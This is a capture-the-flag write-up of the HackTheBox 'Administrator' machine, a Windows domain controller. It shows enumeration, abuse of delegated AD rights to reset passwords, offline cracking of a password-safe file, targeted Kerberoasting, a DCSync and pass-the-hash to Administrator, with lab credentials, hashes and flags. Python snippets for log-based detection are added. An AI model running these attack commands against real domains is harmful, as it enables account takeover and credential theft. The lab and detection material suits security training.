# HackTheBox Administrator

```shell
❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.42 -oG port

PORT     STATE SERVICE          REASON
21/tcp   open  ftp              syn-ack ttl 127
53/tcp   open  domain           syn-ack ttl 127
88/tcp   open  kerberos-sec     syn-ack ttl 127
135/tcp  open  msrpc            syn-ack ttl 127
139/tcp  open  netbios-ssn      syn-ack ttl 127
389/tcp  open  ldap             syn-ack ttl 127
445/tcp  open  microsoft-ds     syn-ack ttl 127
464/tcp  open  kpasswd5         syn-ack ttl 127
593/tcp  open  http-rpc-epmap   syn-ack ttl 127
636/tcp  open  ldapssl          syn-ack ttl 127
3268/tcp open  globalcatLDAP    syn-ack ttl 127
3269/tcp open  globalcatLDAPssl syn-ack ttl 127
```

***

```shell
❯ nmap -sCV -p21,53,88,135,139,389,445,464,593,636,3268,3269 10.10.11.42 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 16:43 EDT
Nmap scan report for 10.10.11.42
Host is up (0.037s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-25 19:47:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-25T19:47:23
|_  start_date: N/A
|_clock-skew: -55m49s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

Open ports, with the service and version running on each.
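As an added example (not part of the original writeup), a small Python parser that pulls the Active Directory facts out of the nmap -sCV output above and checks the reported clock skew against the default 5-minute Kerberos tolerance, which is why the Kerberos TGT request fails with KRB_AP_ERR_SKEW later in the bloodhound-python run. The input lines are copied from that scan; stripping the trailing "0." that nmap prints after the LDAP domain is an assumption about nmap's formatting.

```python
import re
from datetime import timedelta

# Lines copied from the nmap -sCV output above (the writeup's own scan, not constructed data).
NMAP_OUTPUT = """\
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-25 19:47:18Z)
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
|_clock-skew: -55m49s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
"""

KERBEROS_MAX_SKEW = timedelta(minutes=5)  # default tolerance; beyond it the KDC answers KRB_AP_ERR_SKEW


def parse_skew(text):
    """Turn nmap's clock-skew string ('-55m49s', '1h2m3s', '12s') into a signed timedelta."""
    m = re.fullmatch(r"(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?", text.strip())
    if not m or not any(m.group(i) for i in (2, 3, 4)):
        raise ValueError(f"unrecognised skew value: {text!r}")
    sign = -1 if m.group(1) else 1
    hours, minutes, seconds = (int(g or 0) for g in m.groups()[1:])
    return sign * timedelta(hours=hours, minutes=minutes, seconds=seconds)


def parse_nmap(output):
    """Extract domain, DC host name, clock skew and SMB signing policy from nmap -sCV output."""
    facts = {"domain": None, "host": None, "skew": None, "smb_signing_required": False}
    for line in output.splitlines():
        if m := re.search(r"\(Domain: ([^,]+),", line):
            # nmap prints the LDAP domain as "administrator.htb0." (assumed artefact): drop the "0."
            facts["domain"] = re.sub(r"0?\.$", "", m.group(1))
        elif m := re.search(r"Service Info: Host: ([^;]+);", line):
            facts["host"] = m.group(1)
        elif m := re.search(r"clock-skew: (\S+)", line):
            facts["skew"] = parse_skew(m.group(1))
        elif "Message signing enabled and required" in line:
            facts["smb_signing_required"] = True
    return facts


def kerberos_ok(skew, tolerance=KERBEROS_MAX_SKEW):
    """True when a client with this skew can authenticate via Kerberos without syncing its clock first."""
    return abs(skew) <= tolerance


if __name__ == "__main__":
    facts = parse_nmap(NMAP_OUTPUT)
    print(facts)
    print("Kerberos usable without time sync:", kerberos_ok(facts["skew"]))
```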

***

```shell
❯ ldapsearch -x -H ldap://10.10.11.42 -s base | grep 'ServiceName'
ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
```

We confirm the domain name and add the DC's names to /etc/hosts.

***

## nxc

```shell
❯ nxc winrm 10.10.11.42 -u 'Olivia' -p 'ichliebedich'  2>/dev/null
WINRM       10.10.11.42     5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.10.11.42     5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)
```

> This command **checks whether the supplied credentials authenticate** successfully over **WinRM**, the protocol used for remote administration of Windows systems.

***

```shell
❯ evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.11.42
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2
*Evil-WinRM* PS C:\Users\olivia\Documents> 
```

We connect and we are in.

***

```shell
❯ nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --users 2>/dev/null
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\Olivia:ichliebedich 
SMB         10.10.11.42     445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-                                   
SMB         10.10.11.42     445    DC               Administrator                 2024-10-22 18:59:36 0       Built-in account for administering the computer/domain
SMB         10.10.11.42     445    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.42     445    DC               krbtgt                        2024-10-04 19:53:28 0       Key Distribution Center Service Account 
SMB         10.10.11.42     445    DC               olivia                        2024-10-06 01:22:48 0        
SMB         10.10.11.42     445    DC               michael                       2025-04-24 01:58:57 0        
SMB         10.10.11.42     445    DC               benjamin                      2025-04-24 02:02:27 0        
SMB         10.10.11.42     445    DC               emily                         2024-10-30 23:40:02 0        
SMB         10.10.11.42     445    DC               ethan                         2024-10-12 20:52:14 0        
SMB         10.10.11.42     445    DC               alexander                     2024-10-31 00:18:04 0        
SMB         10.10.11.42     445    DC               emma                          2024-10-31 00:18:35 0        
SMB         10.10.11.42     445    DC               [*] Enumerated 10 local users: ADMINISTRATOR
```

With this command we are asking the SMB server: **"With this username and password, can you tell me which users exist on the system?"**
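An added example, not from the original writeup: parse the nxc --users table above into records and flag accounts whose password was set recently or never set. A sudden change in "Last PW Set" is exactly the trace that the GenericAll / ForceChangePassword resets performed later in this writeup leave behind, so this is the check a defender would run over the same listing. The reference date 2025-04-26 and the 7-day window are assumptions chosen for the demonstration.

```python
import re
from datetime import datetime, timedelta

# Lines copied from the nxc --users output above (the writeup's own enumeration, not constructed data).
NXC_USERS = """\
SMB         10.10.11.42     445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.10.11.42     445    DC               Administrator                 2024-10-22 18:59:36 0       Built-in account for administering the computer/domain
SMB         10.10.11.42     445    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.42     445    DC               krbtgt                        2024-10-04 19:53:28 0       Key Distribution Center Service Account
SMB         10.10.11.42     445    DC               olivia                        2024-10-06 01:22:48 0
SMB         10.10.11.42     445    DC               michael                       2025-04-24 01:58:57 0
SMB         10.10.11.42     445    DC               benjamin                      2025-04-24 02:02:27 0
SMB         10.10.11.42     445    DC               emily                         2024-10-30 23:40:02 0
SMB         10.10.11.42     445    DC               [*] Enumerated 10 local users: ADMINISTRATOR
"""

# One data row: prefix columns, user, pwdLastSet (or <never>), bad-password count, optional description.
USER_LINE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<user>\S+)\s+"
    r"(?P<pwset><never>|\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+(?P<badpw>\d+)\s*(?P<desc>.*?)\s*$"
)


def parse_users(text):
    """Turn the nxc user table into records; header, banner and summary lines do not match and are skipped."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.match(line)
        if not m:
            continue
        pw_set = None if m["pwset"] == "<never>" else datetime.strptime(m["pwset"], "%Y-%m-%d %H:%M:%S")
        users.append({"user": m["user"], "pw_last_set": pw_set,
                      "bad_pw": int(m["badpw"]), "description": m["desc"]})
    return users


def recent_resets(users, now, days=7):
    """Accounts whose password changed within `days` before `now` (an ISO timestamp string)."""
    ref = datetime.strptime(now, "%Y-%m-%d %H:%M:%S")
    return [u["user"] for u in users
            if u["pw_last_set"] is not None and timedelta(0) <= ref - u["pw_last_set"] <= timedelta(days=days)]


def never_set(users):
    """Accounts that never had a password set (nxc prints <never>)."""
    return [u["user"] for u in users if u["pw_last_set"] is None]


if __name__ == "__main__":
    records = parse_users(NXC_USERS)
    print(f"{len(records)} accounts parsed")
    print("password set in the last 7 days:", recent_resets(records, "2025-04-26 14:00:00"))
    print("password never set:", never_set(records))
```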

***

## ldapdomaindump

```shell
❯ ldapdomaindump -u 'administrator.htb\Olivia' -p 'ichliebedich' 10.10.11.42 -o ldap
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
❯ ll
drwxrwxr-x root root 4.0 KB Sat Apr 26 14:20:11 2025  ldap

❯ python3 -m http.server
```

We dump the DC to get an overview of everything and serve the output directory with python3 to browse it.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2Fy1xyOAZtgjgOScrAeIDZ%2F4.png?alt=media&#x26;token=01c89143-9980-476f-a1fc-ca6fab95fdf9" alt=""><figcaption></figcaption></figure>

> We see the same system users we already had from the nxc enumeration, and further down the Remote Management Users, the users that can connect remotely to the DC.

***

```shell
❯ bloodhound-python -u 'olivia' -p 'ichliebedich' -c All --zip -ns 10.10.11.42 -d administrator.htb
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250426004656_bloodhound.zip
```

This command uses `bloodhound-python`, which **collects Active Directory (AD) information** so it can later be analysed visually in BloodHound. Note the warning in the output: the Kerberos TGT request failed with KRB_AP_ERR_SKEW because of the clock skew already reported by nmap, so the tool fell back to NTLM authentication.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FFAHyLBFQVVD8D4vvr2Tv%2F1.png?alt=media&#x26;token=7b25b613-75c1-4e6b-9a70-78a178320107" alt=""><figcaption></figcaption></figure>

We are currently olivia, and we see that olivia has the GenericAll right over the user michael.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FgiqcKn5KoXMNbFdVFzZK%2F2.png?alt=media&#x26;token=6c3f71e7-4586-42d5-8dcb-2ffd99dae915" alt=""><figcaption></figcaption></figure>

> ```shell
> ❯ net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"olivia"%"ichliebedich" -S "10.10.11.42"
> ```
>
> “Hi, I'm `olivia`, and I have the rights. I want to change the password of user `michael` to `newP@ssword2022`.”

🔐 Because `olivia` has sufficient rights over `michael` (the GenericAll right seen in BloodHound), the password change goes through without problems.

***

```shell
❯ evil-winrm -i 10.10.11.42 -u 'michael' -p 'newP@ssword2022'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael
*Evil-WinRM* PS C:\Users\michael\Documents> 
```

We can now connect as michael, since we changed his password.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FcafHKHlIlAo90eHaVNnN%2F3.png?alt=media&#x26;token=6e8f2e68-68b2-4b02-8455-ba87bd3839a1" alt=""><figcaption></figcaption></figure>

Now that we have valid credentials for michael, we see that michael has the ForceChangePassword right over benjamin; in plain terms, we can change benjamin's password.

```shell
❯ net rpc password "benjamin" "newP@ssword2022" -U "administrator.htb"/"michael"%"newP@ssword2022" -S "10.10.11.42"
```

We change benjamin's password.

***

## FTP

```shell
❯ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||51408|)
125 Data connection already open; Transfer starting.
10-05-24  09:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51411|)
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************************************|   952       25.95 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (25.73 KiB/s)
ftp> 
```

> Now, with benjamin's credentials, we connect over FTP and download what we find there.
>
> We connect over FTP because this user is not a member of Remote Management Users.

***

## John

```shell
❯ pwsafe2john Backup.psafe3 > hash

❯ john -w:/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2025-04-26 14:43) 3.448g/s 21186p/s 21186c/s 21186C/s newzealand..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

We obtain a password.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2F2fC9seJZZkn2zqsY0YjP%2F5.png?alt=media&#x26;token=61f93b94-f0d8-42ab-b1f0-af6edb3f21c9" alt=""><figcaption></figcaption></figure>

We open the safe's contents with the cracked password.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FcJVsZJ7ND3BB6hLjmuy7%2F6.png?alt=media&#x26;token=2cb4612e-074e-4006-bc18-1dc820d52b27" alt=""><figcaption></figcaption></figure>

> We obtain the password for the user emily. Remember that she is a member of Remote Management Users, so we can connect with evil-winrm.

```shell
❯ evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVtj8yQFKoHjXmb'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> cd ..//Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> more user.txt
93ced29a839897ff6fbe6c1fe7d0df4c

*Evil-WinRM* PS C:\Users\emily\Desktop> 
```

> We connect and get the first flag.

***

## Privilege Escalation

The account **emily** was found to hold **GenericWrite** over the account **ethan**, which allows modifying attributes such as **`servicePrincipalName`** (SPN). Taking advantage of this, **targetedKerberoast** was used to temporarily assign a fake SPN to **ethan**.

A **TGS (Ticket Granting Service)** ticket was then requested from the DC, yielding an **encrypted hash** tied to that service. Finally, the assigned SPN was removed so as not to leave traces behind.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FveAsA6OIfPNmlCHTztVj%2F7.png?alt=media&#x26;token=5b33ad6e-8096-461a-80e0-7f2f5a3b0731" alt=""><figcaption></figcaption></figure>

Tool: <https://github.com/ShutdownRepo/targetedKerberoast>

```shell
❯ pip3 install -r requirements.txt --break-system-packages
```

***

```shell
❯ ntpdate 10.10.11.42 | python3 targetedKerberoast.py -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -d administrator.htb --dc-ip 10.10.11.42
```

> First we synchronise our clock with the server to avoid Kerberos authentication errors, and then run a targeted **Kerberoast** authenticating as the user `emily` in the domain `administrator.htb`, using her known password, against the DC at `10.10.11.42`.

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FWaSOppqXSgFLkRQwPC66%2F8.png?alt=media&#x26;token=d0d6b78d-2759-4f8a-b675-e68cb50cd089" alt=""><figcaption></figcaption></figure>

```shell
❯ john -w:/usr/share/wordlists/rockyou.txt EthanHash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2025-04-26 14:54) 100.0g/s 512000p/s 512000c/s 512000C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

We crack the hash for the user ethan and now have ethan's password.
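An added detection example, not code from the writeup or from targetedKerberoast: on the DC, this step leaves two traces in the Security log, a 4769 service-ticket request with RC4 encryption (etype 23, 0x17, the hash type john loaded above) for a user-account SPN, and, when directory-service auditing is enabled, 5136 object-modified events where an SPN is added to a user and deleted again shortly after. The events below are constructed for the demonstration; the time stamps, the DN and the 10-minute gap are assumptions.

```python
from datetime import datetime

RC4_HMAC = "0x17"  # etype 23, the "krb5tgs ... etype 23 [... RC4]" hash type john loaded above
SPN_ADDED, SPN_DELETED = "%%14674", "%%14675"  # 5136 OperationType codes: Value Added / Value Deleted

# Constructed 4769 (Kerberos service ticket requested) events, trimmed to the relevant fields.
EVENTS_4769 = [
    {"TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "ethan", "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
    {"TargetUserName": "DC$@ADMINISTRATOR.HTB", "ServiceName": "DC$", "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
]
# Constructed 5136 (directory service object modified) events: the SPN is written, then removed two seconds later.
ETHAN_DN = "CN=ethan,CN=Users,DC=administrator,DC=htb"  # assumed DN
EVENTS_5136 = [
    {"Time": "2025-04-26 14:50:01", "SubjectUserName": "emily", "ObjectDN": ETHAN_DN,
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": SPN_ADDED},
    {"Time": "2025-04-26 14:50:03", "SubjectUserName": "emily", "ObjectDN": ETHAN_DN,
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": SPN_DELETED},
]


def is_kerberoast_candidate(ev):
    """RC4 service ticket for a user account: the kind of ticket an offline crack like the john run above needs."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"] == RC4_HMAC and ev["Status"] == "0x0"
            and not svc.endswith("$")        # computer accounts have long random passwords, not crackable
            and svc.lower() != "krbtgt")     # TGT traffic, not a service ticket


def kerberoast_report(events):
    """Requesting account -> sorted list of user-account SPNs it obtained RC4 tickets for."""
    report = {}
    for ev in events:
        if is_kerberoast_candidate(ev):
            report.setdefault(ev["TargetUserName"], set()).add(ev["ServiceName"])
    return {who: sorted(spns) for who, spns in report.items()}


def transient_spns(events, max_gap_s=600):
    """(actor, object DN) pairs where an SPN was added and deleted again within max_gap_s seconds."""
    pending, hits = {}, []
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev["AttributeLDAPDisplayName"] != "servicePrincipalName":
            continue
        key = (ev["SubjectUserName"], ev["ObjectDN"])
        t = datetime.strptime(ev["Time"], "%Y-%m-%d %H:%M:%S")
        if ev["OperationType"] == SPN_ADDED:
            pending[key] = t
        elif ev["OperationType"] == SPN_DELETED and key in pending:
            if (t - pending.pop(key)).total_seconds() <= max_gap_s:
                hits.append(key)
    return hits


if __name__ == "__main__":
    print("RC4 tickets for user SPNs:", kerberoast_report(EVENTS_4769))
    print("SPNs added and removed within 10 min:", transient_spns(EVENTS_5136))
```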

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FfVnW33qXhKJhZefZufH1%2F10.png?alt=media&#x26;token=a6d9b20f-1cf0-4613-bc10-e23ce57a93ba" alt=""><figcaption></figcaption></figure>

> Checking **BloodHound** again, we verify that the user **ethan@administrator.htb** holds **DCSync** privileges, which lets us carry out a **DCSync attack**. This gives us all the **NTLM** hashes from **NTDS.dit**, the **Active Directory** database that stores the password hashes of every domain user.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FqhQcTeJnT3ikWa6zpFET%2F11.png?alt=media&#x26;token=b46b97c1-a150-414a-afc2-ffd34dfaeb07" alt=""><figcaption></figcaption></figure>

We verify that the NTLM hash is valid, then connect through **evil-winrm** as **administrator@administrator.htb** and read the **root.txt** flag.
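An added detection example, not from the writeup: with "Audit Directory Service Access" enabled, a DCSync shows up as a 4662 event in which an account exercises the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control-access rights on the domain object, and any such event from a principal that is not a domain controller deserves review. The 4662 records below are constructed for the demonstration; the `allowed` parameter is an assumption for environments with legitimate sync accounts.

```python
import re

# Well-known AD extended-right GUIDs that directory replication (and therefore DCSync) requires.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
CONTROL_ACCESS = "0x100"  # AccessMask value for exercising an extended (control-access) right
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

# Constructed 4662 (operation performed on an object) events, trimmed to the relevant fields.
DOMAIN_DN = "DC=administrator,DC=htb"
EVENTS_4662 = [
    {"SubjectUserName": "DC$", "ObjectName": DOMAIN_DN, "AccessMask": CONTROL_ACCESS,      # normal DC replication
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"SubjectUserName": "ethan", "ObjectName": DOMAIN_DN, "AccessMask": CONTROL_ACCESS,    # a user replicating
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"SubjectUserName": "emily", "ObjectName": f"CN=ethan,CN=Users,{DOMAIN_DN}", "AccessMask": "0x20",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},  # placeholder GUID: an unrelated attribute write
]


def dcsync_candidates(events, allowed=frozenset()):
    """Non-DC accounts (not in `allowed`) that exercised a replication right, with the rights they used."""
    hits = []
    for ev in events:
        actor = ev["SubjectUserName"]
        if ev["AccessMask"] != CONTROL_ACCESS or actor.endswith("$") or actor in allowed:
            continue
        rights = sorted(set(GUID_RE.findall(ev["Properties"].lower())) & REPLICATION_RIGHTS)
        if rights:
            hits.append((actor, ev["ObjectName"], rights))
    return hits


if __name__ == "__main__":
    for actor, obj, rights in dcsync_candidates(EVENTS_4662):
        print(f"possible DCSync: {actor} used {', '.join(rights)} on {obj}")
```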

***

```shell
❯ evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd10bd016e098d2d2fd2e'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..//Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
49b12488f6763c3033dd93bf2d9fc4c4

*Evil-WinRM* PS C:\Users\Administrator\Desktop> 
```

We connect, and the machine is solved: we are Administrator.
